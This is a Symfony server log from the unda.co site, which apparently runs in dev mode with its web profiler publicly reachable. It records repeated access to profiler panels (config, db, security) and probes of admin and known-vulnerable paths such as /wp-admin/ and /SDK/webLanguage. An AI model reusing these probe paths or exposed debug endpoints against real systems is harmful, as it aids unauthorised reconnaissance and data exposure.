[2025-12-21 05:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
[2025-12-21 05:45:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-21 05:47:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1dc617","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/1dc617/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 05:47:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 05:48:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 05:52:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71","method":"GET"} []
[2025-12-21 05:52:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 05:54:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=logger","method":"GET"} []
[2025-12-21 05:54:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 05:55:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 05:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=router","method":"GET"} []
[2025-12-21 05:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-21 05:57:48] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"cc2d11","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/cc2d11/router","method":"GET"} []
[2025-12-21 05:59:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 05:59:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:00:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
[2025-12-21 06:00:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 06:01:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6bfa8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6bfa8","method":"GET"} []
[2025-12-21 06:01:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 06:02:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"d7ef7a","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/d7ef7a/search/results?ip=52.167.144.177&limit=10","method":"GET"} []
[2025-12-21 06:02:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=52.167.144.177&limit=10","method":"GET"} []
[2025-12-21 06:06:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-21 06:12:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=logger","method":"GET"} []
[2025-12-21 06:12:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 06:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=validator","method":"GET"} []
[2025-12-21 06:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 06:14:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 06:15:55] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:15:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:16:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=config","method":"GET"} []
[2025-12-21 06:16:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 06:21:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=db","method":"GET"} []
[2025-12-21 06:21:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 06:25:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SDK/webLanguage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SDK/webLanguage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 06:26:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-21 06:26:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 06:26:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 06:26:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 06:26:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 06:26:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-21 06:26:31] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-21 06:26:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 06:26:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 06:26:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 06:26:31] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 06:26:32] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-21 06:26:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "http://admin.unda.co/wp-admin/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"http://admin.unda.co/wp-admin/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 06:26:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/" (from "http://admin.unda.co/administrator/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/\" (from \"http://admin.unda.co/administrator/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 06:26:39] request.INFO: Matched route "user_form". {"route":"user_form","route_parameters":{"uuid":"login","_controller":"Hona\\AdminBundle\\Controller\\UserController::userFormAction","_route":"user_form"},"request_uri":"https://admin.unda.co/user/login","method":"GET"} []
[2025-12-21 06:26:39] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 06:26:39] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:39] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:39] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 06:26:39] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 06:26:39] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 06:26:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2Fuser%2Flogin","method":"GET"} []
[2025-12-21 06:26:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://admin.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://admin.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 06:26:44] request.INFO: Matched route "hona_admin_login_index". {"route":"hona_admin_login_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\LoginController::indexAction","_route":"hona_admin_login_index"},"request_uri":"https://admin.unda.co/login","method":"GET"} []
[2025-12-21 06:26:44] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 06:26:44] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:44] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:44] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 06:26:44] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 06:26:44] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 06:26:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2Flogin","method":"GET"} []
[2025-12-21 06:26:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /register" (from "http://admin.unda.co/register")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /register\" (from \"http://admin.unda.co/register\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 06:26:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://admin.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://admin.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 06:26:50] request.INFO: Matched route "hona_admin_login_index". {"route":"hona_admin_login_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\LoginController::indexAction","_route":"hona_admin_login_index"},"request_uri":"https://admin.unda.co/login","method":"GET"} []
[2025-12-21 06:26:50] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 06:26:50] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:50] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 06:26:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 06:26:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 06:26:51] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 06:26:52] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2Flogin","method":"GET"} []
[2025-12-21 06:27:33] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:27:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=validator","method":"GET"} []
[2025-12-21 06:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 06:30:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=validator","method":"GET"} []
[2025-12-21 06:30:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 06:37:00] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6e6d61","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6e6d61/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:37:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 06:38:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=db","method":"GET"} []
[2025-12-21 06:38:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 06:38:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=exception","method":"GET"} []
[2025-12-21 06:38:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 06:38:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=logger","method":"GET"} []
[2025-12-21 06:38:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 06:38:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b633d3","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/b633d3","method":"GET"} []
[2025-12-21 06:38:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 06:39:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=cache","method":"GET"} []
[2025-12-21 06:39:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 06:39:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=swiftmailer","method":"GET"} []
[2025-12-21 06:39:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-21 06:39:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=router","method":"GET"} []
[2025-12-21 06:39:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-21 06:39:01] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"7061e0","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/7061e0/router","method":"GET"} []
[2025-12-21 06:39:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=events","method":"GET"} []
[2025-12-21 06:39:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 06:39:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b633d3","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/b633d3?panel=time","method":"GET"} []
[2025-12-21 06:39:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 06:39:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=validator","method":"GET"} []
[2025-12-21 06:39:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 06:39:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=form","method":"GET"} []
[2025-12-21 06:39:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-21 06:39:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7061e0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7061e0?panel=security","method":"GET"} []
